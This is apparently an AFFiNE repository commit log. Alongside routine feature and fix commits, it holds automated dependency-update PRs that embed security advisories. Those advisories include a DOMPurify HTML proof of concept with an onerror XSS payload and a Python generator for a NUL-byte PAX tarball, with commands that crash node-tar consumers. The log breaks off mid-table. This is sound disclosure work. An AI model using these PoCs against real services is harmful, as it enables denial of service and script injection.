![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/dompurify/3.4.11/3.4.12?slim=true)
|

---

### DOMPurify: `CUSTOM_ELEMENT_HANDLING` bypasses
`afterSanitizeElements` for allowed custom elements.

[GHSA-c2j3-45gr-mqc4](https://redirect.github.com/advisories/GHSA-c2j3-45gr-mqc4)

<details>
<summary>More information</summary>

#### Details
##### Summary

There is a possible hook-policy inconsistency in DOMPurify 3.4.11
involving `CUSTOM_ELEMENT_HANDLING`.

When a custom element is allowed via
`CUSTOM_ELEMENT_HANDLING.tagNameCheck`, it appears that the element does
not go through `afterSanitizeElements` in the same way as a normal
element. As a result, an application that relies on
`afterSanitizeElements` as a security policy layer to strip sensitive
attributes from all elements may see those attributes removed from
normal elements but preserved on allowed custom elements.

This does not appear to be a direct DOMPurify XSS or a case where
DOMPurify directly allows executable payloads. The preserved value is
still inert at sanitize time. The issue becomes relevant when the
allowed custom element later re-injects that attribute value into an
HTML sink such as `innerHTML`, creating a second-order XSS gadget.

##### Details

The issue appears to originate from the control flow in `src/purify.ts`:
line 1672~1691

```tsx
const _sanitizeDisallowedNode = function (
    currentNode: any,
    tagName: string
  ): boolean {
    /* Check if we have a custom element to handle */
    if (!FORBID_TAGS[tagName] && _isBasicCustomElement(tagName)) {
      if (
        CUSTOM_ELEMENT_HANDLING.tagNameCheck instanceof RegExp &&
        regExpTest(CUSTOM_ELEMENT_HANDLING.tagNameCheck, tagName)
      ) {
        return false;
      }

      if (
        CUSTOM_ELEMENT_HANDLING.tagNameCheck instanceof Function &&
        CUSTOM_ELEMENT_HANDLING.tagNameCheck(tagName)
      ) {
        return false;
      }
    }
```

`CUSTOM_ELEMENT_HANDLING` is parsed from user configuration at
`src/purify.ts`: line 741~748

```tsx
const customElementHandling =
      objectHasOwnProperty(cfg, 'CUSTOM_ELEMENT_HANDLING') &&
      cfg.CUSTOM_ELEMENT_HANDLING &&
      typeof cfg.CUSTOM_ELEMENT_HANDLING === 'object'
        ? clone(cfg.CUSTOM_ELEMENT_HANDLING)
        : create(null);

    CUSTOM_ELEMENT_HANDLING = create(null);
```

In particular, `tagNameCheck`, `attributeNameCheck`, and
`allowCustomizedBuiltInElements` are copied into the internal
`CUSTOM_ELEMENT_HANDLING` object there.

During element sanitization, `_sanitizeElements()` checks whether a node
is forbidden or not allowlisted at `src/purify.ts`: line 1805~1814

```tsx
/* Remove element if anything forbids its presence */
    if (
      FORBID_TAGS[tagName] ||
      (!(
        EXTRA_ELEMENT_HANDLING.tagCheck instanceof Function &&
        EXTRA_ELEMENT_HANDLING.tagCheck(tagName)
      ) &&
        !ALLOWED_TAGS[tagName])
    ) {
      return _sanitizeDisallowedNode(currentNode, tagName);
    }
```

If so, it immediately delegates to `_sanitizeDisallowedNode(currentNode,
tagName)` and returns its boolean result.

Inside `_sanitizeDisallowedNode()`, the custom-element-specific allow
path is implemented at `src/purify.ts`: line 1672~1692

```tsx
const _sanitizeDisallowedNode = function (
    currentNode: any,
    tagName: string
  ): boolean {
    /* Check if we have a custom element to handle */
    if (!FORBID_TAGS[tagName] && _isBasicCustomElement(tagName)) {
      if (
        CUSTOM_ELEMENT_HANDLING.tagNameCheck instanceof RegExp &&
        regExpTest(CUSTOM_ELEMENT_HANDLING.tagNameCheck, tagName)
      ) {
        return false;
      }

      if (
        CUSTOM_ELEMENT_HANDLING.tagNameCheck instanceof Function &&
        CUSTOM_ELEMENT_HANDLING.tagNameCheck(tagName)
      ) {
        return false;
      }
    }
```

If the node is treated as a basic custom element and
`CUSTOM_ELEMENT_HANDLING.tagNameCheck` matches, the function returns
`false` immediately at line 1682 or 1689, meaning “do not remove this
node”.

That early `return false` is significant because control returns
directly to `_sanitizeElements()` via the `return
_sanitizeDisallowedNode(...)` at line 1813. As a result, the later logic
in `_sanitizeElements()` is skipped for that custom element instance,
including:

- the namespace validation at `src/purify.ts`: line 1816~1826

```tsx
* Check whether element has a valid namespace.
       Realm-safe check (GHSA-hpcv-96wg-7vj8): use the cached Node.prototype
       nodeType getter rather than `instanceof Element`, which is realm-
       bound and short-circuits to false for any node minted in a different
       realm — letting a foreign-realm element with a forbidden namespace
       slip past the namespace check entirely. */
    const nt = getNodeType ? getNodeType(currentNode) : currentNode.nodeType;
    if (nt === NODE_TYPE.element && !_checkValidNamespace(currentNode)) {
      _forceRemove(currentNode);
      return true;
    }
```

- the fallback-tag mXSS check at `src/purify.ts`: line 1828~1837

```tsx
/* Make sure that older browsers don't get fallback-tag mXSS */
    if (
      (tagName === 'noscript' ||
        tagName === 'noembed' ||
        tagName === 'noframes') &&
      regExpTest(EXPRESSIONS.FALLBACK_TAG_CLOSE, currentNode.innerHTML)
    ) {
      _forceRemove(currentNode);
      return true;
    }
```

- most importantly for this report, the `afterSanitizeElements` hook
dispatch at `src/purify.ts`: line 1850~1851.

```tsx
   /* Execute a hook if present */
    _executeHooks(hooks.afterSanitizeElements, currentNode, null);
```

In other words, a normal allowlisted element continues through
`_sanitizeElements()` and reaches `hooks.afterSanitizeElements`, but a
disallowed-by-default element that is revived by the
`CUSTOM_ELEMENT_HANDLING.tagNameCheck` path does not. This creates a
policy inconsistency: an application that relies on
`afterSanitizeElements` to remove an attribute from all elements will
observe that the policy is applied to normal elements but not to custom
elements allowed through `CUSTOM_ELEMENT_HANDLING`.

In the PoC, the application hook removes `data-bio` from ordinary
elements, but the same attribute remains on `<x-bio>` because the
custom-element keep path bypasses `afterSanitizeElements`. The attribute
itself is inert at sanitize time and DOMPurify is not directly allowing
executable SVG/HTML through. The security impact appears when the
application-defined custom element later reads the preserved `data-bio`
value in `connectedCallback()` and writes it to `innerHTML`, turning the
preserved attribute into a second-order XSS gadget.

##### PoC

Reproduced on DOMPurify 3.4.11.

##### Steps

1. Save the following HTML to a file, for example `poc.html`.
2. Open it in a browser.
3. Observe that the `div` control loses `data-bio`, while the allowed
custom element keeps it.
4. Observe that after `connectedCallback()` runs, the candidate payload
is reinserted into the DOM and executes through the custom element’s own
sink.

##### HTML PoC

```html
<!DOCTYPE html>
<html>
<head>
  <meta charset="UTF-8">
  <script src="https://cdnjs.cloudflare.com/ajax/libs/dompurify/3.4.11/purify.min.js"></script>
</head>
<body>
<pre id="result"></pre>

<script>
window.__controlFired = false;
window.__candidateFired = false;

customElements.define("x-bio", class extends HTMLElement {
  connectedCallback() {
    const bio = this.getAttribute("data-bio");
    if (bio) this.innerHTML = bio;
  }
});

DOMPurify.addHook("afterSanitizeElements", node => {
  if (node.hasAttribute && node.hasAttribute("data-bio")) {
    node.removeAttribute("data-bio");
  }
});

const config = {
  CUSTOM_ELEMENT_HANDLING: {
    tagNameCheck: /^x-/
  }
};

const controlInput =
  '<div data-bio="&lt;img src=x onerror=window.__controlFired=true&gt;"></div>';

const candidateInput =
  '<x-bio data-bio="&lt;img src=x onerror=window.__candidateFired=true&gt;"></x-bio>';

const cleanControl = DOMPurify.sanitize(controlInput, config);
const cleanCandidate = DOMPurify.sanitize(candidateInput, config);

const container = document.createElement("div");
container.innerHTML = cleanCandidate;
document.body.appendChild(container);

setTimeout(() => {
  document.getElementById("result").textContent =
    "This is not direct DOMPurify XSS.\n" +
    "The payload becomes executable only after x-bio writes data-bio into innerHTML.\n\n" +
    "control: " + cleanControl + "\n" +
    "candidate: " + cleanCandidate + "\n" +
    "after connectedCallback: " + container.innerHTML + "\n" +
    "control fired: " + window.__controlFired + "\n" +
    "candidate fired: " + window.__candidateFired;
}, 100);
</script>
</body>
</html>
```

##### Expected result

```
control: <div></div>
candidate: <x-bio data-bio="<img src=x onerror=window.__candidateFired=true>"></x-bio>
after connectedCallback: <x-bio data-bio="..."><img src="x" onerror="window.__candidateFired=true"></x-bio>
control fired: false
candidate fired: true
```

This is output of HTML PoC.

<img width="1917" height="961" alt="poc"
src="https://github.com/user-attachments/assets/80e22989-5779-42f8-8ffb-106e9a4c2b10"
/>

##### Impact

This does not appear to affect DOMPurify’s default configuration as a
direct sanitizer bypass.

The impact is limited to applications that:

- enable `CUSTOM_ELEMENT_HANDLING`,
- rely on `afterSanitizeElements` as a security policy layer,
- expect that hook to apply uniformly to all surviving elements,
- and have allowed custom elements that later re-inject preserved
attribute values into `innerHTML` or another HTML sink.

In that situation, the behavior can become a second-order XSS gadget
because a security-relevant attribute is removed from normal elements
but remains on allowed custom elements.

Possible fixes or mitigations might include

- ensuring that allowed custom elements also consistently pass through
`afterSanitizeElements`
- documenting clearly that elements preserved via
`CUSTOM_ELEMENT_HANDLING` may not participate in the same post-element
hook flow as normal allowlisted elements.

#### Severity
- CVSS Score: 2.1 / 10 (Low)
- Vector String:
`CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N`

#### References
-
[https://github.com/cure53/DOMPurify/security/advisories/GHSA-c2j3-45gr-mqc4](https://redirect.github.com/cure53/DOMPurify/security/advisories/GHSA-c2j3-45gr-mqc4)
-
[https://github.com/cure53/DOMPurify/pull/1537](https://redirect.github.com/cure53/DOMPurify/pull/1537)
-
[https://github.com/cure53/DOMPurify/commit/a9ca1e537422319a557a9a2aa61f003b23b4a197](https://redirect.github.com/cure53/DOMPurify/commit/a9ca1e537422319a557a9a2aa61f003b23b4a197)
-
[https://github.com/cure53/DOMPurify/releases/tag/3.4.12](https://redirect.github.com/cure53/DOMPurify/releases/tag/3.4.12)
-
[https://github.com/advisories/GHSA-c2j3-45gr-mqc4](https://redirect.github.com/advisories/GHSA-c2j3-45gr-mqc4)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-c2j3-45gr-mqc4)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>cure53/DOMPurify (dompurify)</summary>

###
[`v3.4.12`](https://redirect.github.com/cure53/DOMPurify/releases/tag/3.4.12):
DOMPurify 3.4.12

[Compare
Source](https://redirect.github.com/cure53/DOMPurify/compare/3.4.11...3.4.12)

- Fixed an issue where a hook would not get called for custom elements,
thanks [@&#8203;Rikuxx0](https://redirect.github.com/Rikuxx0)
- Hardened the handling of hooks removing elements,
[@&#8203;mkrause-bee360](https://redirect.github.com/mkrause-bee360)
- Added support for a few new SVG attributes, thanks
[@&#8203;cbn-falias](https://redirect.github.com/cbn-falias) &
[@&#8203;Develop-KIM](https://redirect.github.com/Develop-KIM)
- Hardened the handling of declarative partial updates
- Updated the documentation is several spots, README, wiki, etc.
- Bumped several dependencies where possible

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yNzUuMiIsInVwZGF0ZWRJblZlciI6IjQzLjI3NS4yIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-07-23 11:35:23 +08:00
DarkSky 49625298ee fix(editor): kanban data refresh (#15321)
fix #15281


#### PR Dependency Tree


* **PR #15321** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Bug Fixes**
* Improved row handling during group and card updates to prevent rows
from remaining locked.
* Preserved manual card ordering when moving cards or updating group
values.
  * Added coverage to verify row unlocking behavior during card moves.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
v0.27.3-beta.1
2026-07-23 00:23:49 +08:00
DarkSky 1d36e2e4b2 feat(core): improve mobile perf (#15317)
#### PR Dependency Tree


* **PR #15317** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Virtualized mobile navigation with shell navigation and interactive
swipe menus; coordinated mobile back handling with interactive
phases/state restoration.
* Added shared auth request proxy and message-port based token handling
across mobile and worker flows.
* **Bug Fixes**
  * Hydrated remote worker error stacks for calls and observable errors.
* Improved SQLite FTS/indexer and nbstore optional text handling;
refined docs-search ref parsing and notification loading/retry.
* **Refactor / UX**
* Modal focus-preservation and pointer behavior updates; improved mobile
menu controls and back gesture plugins.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-07-23 00:23:21 +08:00
DarkSky 02e75862cc fix(core): token race condition (#15320)
fix #15318
fix #15310

#### PR Dependency Tree


* **PR #15320** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Bug Fixes**
* Authenticated sessions are now restored automatically when the desktop
app starts.
* Previously saved access tokens are available immediately for
recognized endpoints.
* A problem initializing one saved session no longer prevents other
sessions from loading.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-07-22 21:42:23 +08:00
DarkSky 4b37f9d42e feat(editor): improve obsidian import (#15304)
fix #15290



#### PR Dependency Tree


* **PR #15304** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **New Features**
* Improved Obsidian vault imports with more reliable attachment and
embedded image matching.
  * Supports nested vault structures and configured attachment folders.
* Preserves imported folder hierarchy and organizes imported content
more accurately.

* **Bug Fixes**
* Fixed asset resolution for attachments with nested paths or duplicate
filenames.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
v0.27.3-beta.0 v2026.7.22-canary.948
2026-07-21 21:54:05 +08:00
DarkSky fd0e3bd75d fix(core): trash style (#15306)
fix #15259


#### PR Dependency Tree


* **PR #15306** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Bug Fixes**
* Truncated long document titles to 64 characters in the “Move to trash”
confirmation dialog, improving readability and preventing overly long
modal titles.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-07-21 21:53:54 +08:00
DarkSky d0781eafce fix(server): share query (#15305)
fix #15283



#### PR Dependency Tree


* **PR #15305** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Bug Fixes**
* Document metadata now consistently reports documents as not public
when no applicable access policy is available.
* Improved reliability of document visibility information across
document listings and pagination.
* **Tests**
* Added coverage verifying the `public` status in document details and
paginated results.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-07-21 21:53:11 +08:00
DarkSky b6b7f1eeaf feat(core): improve byok ux (#15303)
fix #15265

#### PR Dependency Tree


* **PR #15303** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)
2026-07-21 19:52:34 +08:00
Diego Vega Centeno 7318ef1ed4 fix(core): forward svg props to icon renderer (#15278)
## Problem

Page reference icon is vertically misaligned because the
`pageReferenceIcon` class is not applied.
This is because `IconRenderer` does not forward SVG props to the
underlying `AffineIconRenderer` component.

## Fix

Main fix: 
- Forward SVG props in `getDocIconComponent`.
- Add support for SVG props in `IconRenderer`.

Side fixes: 
- Comment out color in `pageReferenceIcon` style so the icon inherits
its parent color now that the class is actually applied
- Remove hardcoded SVG margin used for vertical alignment.

## Before / After

**Before**
<img width="405" height="163" alt="before"
src="https://github.com/user-attachments/assets/45c6f0c9-d2f8-4295-832a-03018cbe0bf1"
/>

**After**
<img width="404" height="156" alt="after"
src="https://github.com/user-attachments/assets/fa3f955a-b1fd-4bc1-b966-09b5b9d6a7e4"
/>

## Related issues

- Fixes #14978: Makes icon vertically aligned.


<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

- **Bug Fixes**
- Improved icon rendering so additional display properties are correctly
passed through to Affine icons.
- Updated document icon components to support standard SVG properties,
enabling more consistent customization.
- Refined reference icon styling to allow color inheritance from
surrounding UI context.
- Removed unnecessary spacing beneath reference icons for cleaner
alignment.



<!-- end of auto-generated comment: release notes by coderabbit.ai -->
v2026.7.21-canary.949
2026-07-21 14:57:50 +08:00
renovate[bot] 927cc45c7b chore: bump up protobufjs version to v7.6.5 [SECURITY] (#15296)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [protobufjs](https://redirect.github.com/protobufjs/protobuf.js) |
[`7.6.4` →
`7.6.5`](https://renovatebot.com/diffs/npm/protobufjs/7.6.4/7.6.5) |
![age](https://developer.mend.io/api/mc/badges/age/npm/protobufjs/7.6.5?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/protobufjs/7.6.4/7.6.5?slim=true)
|

---

### protobufjs: Denial of Service via infinite loop in .proto option
parsing
[CVE-2026-59877](https://nvd.nist.gov/vuln/detail/CVE-2026-59877) /
[GHSA-j3f2-48v5-ccww](https://redirect.github.com/advisories/GHSA-j3f2-48v5-ccww)

<details>
<summary>More information</summary>

#### Details
##### Summary

protobufjs parsed option names by advancing through schema tokens until
it reached an `=` token, without checking for end of input. A crafted
`.proto` schema that opens an option declaration but ends prematurely
could cause the option parser to loop without ever terminating.

This affects the reflection parsing path (`parse`, `Root.load`,
`Root.loadSync`).

##### Impact

An attacker who can provide or influence `.proto` schema text parsed by
an application may be able to cause the parsing call to never return.
Because Node.js is single-threaded, the blocked event loop prevents all
other work in the process, resulting in a denial of service that
persists until the process is externally terminated.

Applications that only encode or decode protobuf binary data with
trusted schemas are not directly affected.

##### Preconditions

- The application must parse `.proto` schema text influenced by an
attacker.
- The schema must be parsed through APIs such as `parse`, `Root.load`,
or `Root.loadSync`.
- The crafted input must begin an option declaration that ends before
its `=` assignment.

##### Workarounds

Do not parse `.proto` schemas from untrusted sources with affected
versions. If untrusted schema text must be accepted, isolate parsing in
a process or worker that can be safely terminated and bound it with a
timeout, so a non-returning parse call cannot deny service to the rest
of the application.

#### Severity
- CVSS Score: 5.3 / 10 (Medium)
- Vector String: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L`

#### References
-
[https://github.com/protobufjs/protobuf.js/security/advisories/GHSA-j3f2-48v5-ccww](https://redirect.github.com/protobufjs/protobuf.js/security/advisories/GHSA-j3f2-48v5-ccww)
-
[https://nvd.nist.gov/vuln/detail/CVE-2026-59877](https://nvd.nist.gov/vuln/detail/CVE-2026-59877)
-
[https://github.com/protobufjs/protobuf.js/pull/2352](https://redirect.github.com/protobufjs/protobuf.js/pull/2352)
-
[https://github.com/protobufjs/protobuf.js/commit/10fba6d54815ceecca8a06b9a6db490c8f5d2217](https://redirect.github.com/protobufjs/protobuf.js/commit/10fba6d54815ceecca8a06b9a6db490c8f5d2217)
-
[https://github.com/protobufjs/protobuf.js/commit/fa5c73add738ceb471e74da8cc2f3727c3d0a69f](https://redirect.github.com/protobufjs/protobuf.js/commit/fa5c73add738ceb471e74da8cc2f3727c3d0a69f)
-
[https://github.com/protobufjs/protobuf.js/releases/tag/protobufjs-v7.6.5](https://redirect.github.com/protobufjs/protobuf.js/releases/tag/protobufjs-v7.6.5)
-
[https://github.com/protobufjs/protobuf.js/releases/tag/protobufjs-v8.6.6](https://redirect.github.com/protobufjs/protobuf.js/releases/tag/protobufjs-v8.6.6)
-
[https://github.com/advisories/GHSA-j3f2-48v5-ccww](https://redirect.github.com/advisories/GHSA-j3f2-48v5-ccww)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-j3f2-48v5-ccww)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>protobufjs/protobuf.js (protobufjs)</summary>

###
[`v7.6.5`](https://redirect.github.com/protobufjs/protobuf.js/releases/tag/protobufjs-v7.6.5):
protobufjs: v7.6.5

[Compare
Source](https://redirect.github.com/protobufjs/protobuf.js/compare/protobufjs-v7.6.4...protobufjs-v7.6.5)

##### Bug Fixes

- handle EOF during options parsing
([#&#8203;2352](https://redirect.github.com/protobufjs/protobuf.js/issues/2352))
([#&#8203;2356](https://redirect.github.com/protobufjs/protobuf.js/issues/2356))
([10fba6d](https://redirect.github.com/protobufjs/protobuf.js/commit/10fba6d54815ceecca8a06b9a6db490c8f5d2217))

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yNzIuNCIsInVwZGF0ZWRJblZlciI6IjQzLjI3Mi40IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-07-21 13:27:16 +08:00
renovate[bot] cbc63b9f73 chore: bump up tar version to v7.5.19 [SECURITY] (#15297)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [tar](https://redirect.github.com/isaacs/node-tar) | [`7.5.16` →
`7.5.19`](https://renovatebot.com/diffs/npm/tar/7.5.16/7.5.19) |
![age](https://developer.mend.io/api/mc/badges/age/npm/tar/7.5.19?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/tar/7.5.16/7.5.19?slim=true)
|

---

### node-tar: Uncaught Exception DoS via NUL byte in PAX path/linkpath
records
[CVE-2026-59875](https://nvd.nist.gov/vuln/detail/CVE-2026-59875) /
[GHSA-gvwx-54wh-qm9j](https://redirect.github.com/advisories/GHSA-gvwx-54wh-qm9j)

<details>
<summary>More information</summary>

#### Details
##### Summary

`node-tar` strips trailing `NUL` bytes from long-name (`L`) and
long-linkpath (`K`) GNU extended headers but does **not** apply the same
sanitization to equivalent fields delivered via PAX (`x` typeflag)
extended headers. A PAX record of the form
`path=visible.txt\x00hidden.txt` is parsed verbatim into `entry.path`
and flows into `fs.lstat()` / `fs.open()`, which Node.js core rejects
with `ERR_INVALID_ARG_VALUE`. The throw originates inside an
`FSReqCallback` async chain that is **not** wrapped by the consumer's
`await/try-catch` around `tar.x()` — it surfaces as `uncaughtException`
and terminates the process.

This is a remote denial-of-service primitive against any process that
extracts attacker-supplied tarballs through `tar.x` / `tar.extract` /
`tar.t` / `tar.Parser`, even when the consumer follows the documented
`try/catch` error-handling pattern.

A secondary parser-differential (CWE-436) exists because `tar(1)`,
`bsdtar`, and Python `tarfile` truncate the path at the first `NUL`
(yielding `visible.txt`) while node-tar retains the full string. A
validator that pre-scans a tarball with one tool and extracts with the
other is bypassed.

---

##### Root cause

##### Vulnerable sink — `src/pax.ts:157-183`

PAX KV records flow through `parseKVLine`. The value half (`v`) is
assigned directly to the result object with no sanitization for embedded
NUL bytes:

```ts
// src/pax.ts:157
const parseKVLine = (set: Record<string, unknown>, line: string) => {
  const n = parseInt(line, 10)
  if (n !== Buffer.byteLength(line) + 1) return set
  line = line.slice((n + ' ').length)
  const kv = line.split('=')
  const r = kv.shift()
  if (!r) return set
  const k = r.replace(/^SCHILY\.(dev|ino|nlink)/, '$1')
  const v = kv.join('=')                                 // <-- NO NUL STRIP
  set[k] =
    /^([A-Z]+\.)?([mac]|birth|creation)time$/.test(k) ?
      new Date(Number(v) * 1000)
    : /^[0-9]+$/.test(v) ? +v
    : v                                                  // <-- v with NULs lands here
  return set
}
```

The PAX record body is length-prefixed, so the parser knows the exact
byte boundary — but it never checks whether the value half between `=`
and `\n` contains `NUL`. The result is consumed by `Header` /
`ReadEntry`, where `entry.path` and `entry.linkpath` carry the embedded
NUL all the way to `fs.lstat()`.

##### Correctly-patched cousin sink — `src/parse.ts:375-388`

The equivalent code path for GNU L/K long-headers **does** strip NUL
bytes:

```ts
// src/parse.ts:375
case 'NextFileHasLongPath':
case 'OldGnuLongPath': {
  const ex = this[EX] ?? Object.create(null)
  this[EX] = ex
  ex.path = this[META].replace(/\0.*/, '')               // <-- NUL strip applied
  break
}
case 'NextFileHasLongLinkpath': {
  const ex = this[EX] || Object.create(null)
  this[EX] = ex
  ex.linkpath = this[META].replace(/\0.*/, '')           // <-- NUL strip applied
  break
}
```

The `parse.ts` fix is the maintainer's own acknowledgement that path
strings on this codepath must be NUL-stripped before reaching `fs.*`.
The PAX path produces the identical primitive but bypasses the guard.

##### Downstream blast radius

`entry.path` and `entry.linkpath` are consumed in:
- `src/unpack.ts` → `fs.lstat`, `fs.open`, `fs.symlink`, `fs.link`,
`fs.mkdir`
- `src/list.ts` (no crash — listing tolerates NUL in strings)
- Any consumer of the `ReadEntry` event that calls `path.join()` /
`fs.*` on `entry.path`

The crash fires inside the FSReqCallback Node-internal async machinery,
**outside** the user's `await tar.x(...)` Promise rejection boundary.

---

##### Proof of Concept

##### Artifacts
- `poc-null-byte-crash.tar` — 3072 bytes — PAX
`path=visible.txt\x00hidden.txt`
- `poc-null-linkpath-crash.tar` — 2560 bytes — PAX
`linkpath=target\x00garbage` (symlink target sink)
- `poc1-pax-prefix.py` — minimal PAX-header builder (Python 3, no deps)

##### Tarball generator (minimal repro — Python 3)

```python

#!/usr/bin/env python3
"""Minimal PAX-NUL-injection tarball generator for node-tar PoC."""
import os

def cksum(b):
    s = 0
    for i, x in enumerate(b):
        s += 0x20 if 148 <= i < 156 else x
    return s

def pad512(buf):
    rem = len(buf) % 512
    return buf + b'\0' * (512 - rem) if rem else buf

def hdr(name, size, typeflag, prefix=b'', linkpath=b''):
    b = bytearray(512)
    b[0:len(name[:100])] = name[:100]
    b[100:108] = b'0000644\0'
    b[108:116] = b'0001000\0'
    b[116:124] = b'0001000\0'
    b[124:136] = ('%011o ' % size).encode()
    b[136:148] = ('%011o ' % 0).encode()
    b[148:156] = b'        '
    b[156:157] = typeflag
    b[157:157+len(linkpath[:100])] = linkpath[:100]
    b[257:265] = b'ustar\x0000'
    b[265:270] = b'root\0'
    b[297:302] = b'root\0'
    b[329:337] = b'0000000\0'
    b[337:345] = b'0000000\0'
    b[345:345+len(prefix[:155])] = prefix[:155]
    s = cksum(b)
    b[148:156] = ('%06o\0 ' % s).encode()
    return bytes(b)

def pax(records):
    body = b''
    for k, v in records:
        kv = b' ' + k + b'=' + v + b'\n'
        for digits in range(1, 8):
            total = digits + len(kv)
            if len(str(total)) == digits:
                break
        body += str(total).encode() + kv
    return pad512(hdr(b'PaxHeader/poc', len(body), b'x') + body)

out  = pax([(b'path', b'visible.txt\x00hidden.txt')])  # NUL in PAX path
out += hdr(b'placeholder', 1, b'0')
out += pad512(b'A')
out += b'\0' * 1024  # end-of-archive

open('poc.tar', 'wb').write(out)
```

##### Reproduction

```bash

##### 1. Generate tarball
python3 poc1-pax-prefix.py          # writes poc.tar (3 KB)

##### 2. Install vulnerable version
mkdir repro && cd repro
npm init -y && npm install tar@7.5.16

##### 3. Try to extract with documented try/catch — observe uncaught exception
mkdir -p ./out
node --input-type=module -e '
  process.on("uncaughtException", e => {
    console.log("UNCAUGHT:", e.code, "-", e.message);
    process.exit(99);
  });
  import("tar").then(async tar => {
    try {
      await tar.x({ file: "../poc.tar", cwd: "./out" });
      console.log("NORMAL_RETURN");
    } catch (e) {
      console.log("CAUGHT_BY_USER:", e.code);
    }
  });'
```

##### Observed output (verified 2026-06-23 against `tar@7.5.16`)

```
UNCAUGHT: ERR_INVALID_ARG_VALUE - The argument 'path' must be a string,
Uint8Array, or URL without null bytes.
Received '/.../out/visible.txt\x00hidden.txt'
exit: 99
```

The exception bypasses the user's `try { await tar.x(...) } catch (e) {
... }` block and lands in the global `uncaughtException` handler. In a
typical server without that handler, the process exits.

---

##### Impact

##### Direct: remote DoS

Any service that ingests attacker-supplied tarballs via node-tar
inherits a one-tarball-kills-the-process primitive. Realistic
deployments where this is reachable without user interaction:

- npm registry tarball ingestion and downstream mirrors
- GitHub Actions cache restore (`actions/cache`, `actions/setup-*`
extracting toolchains)
- Container image build pipelines that unpack layer tarballs through
node tooling
- Backup-restore services accepting user uploads
- CI artifact processors and badge generators
- Static-site / Docusaurus / Next.js build runners that fetch and
extract dep tarballs
- Cloud functions that auto-extract uploaded archives

A correctly-coded consumer that does:

```js
try {
  await tar.x({ file: req.upload.path, cwd: tmpdir });
} catch (e) {
  return res.status(400).json({ error: 'bad archive' });
}
```

does not catch this throw. The Node process dies and (depending on the
supervisor) the worker may take time to respawn or never respawn if it
dies during boot.

##### Secondary: parser-differential validator bypass (CWE-436)

| Tool | Result for `path=visible.txt\x00hidden.txt` |

|----------------------------|----------------------------------------------|
| GNU tar (`tar -tvf`) | Lists `visible.txt` (truncated at NUL) |
| `bsdtar -tvf` | Lists `visible.txt` (truncated at NUL) |
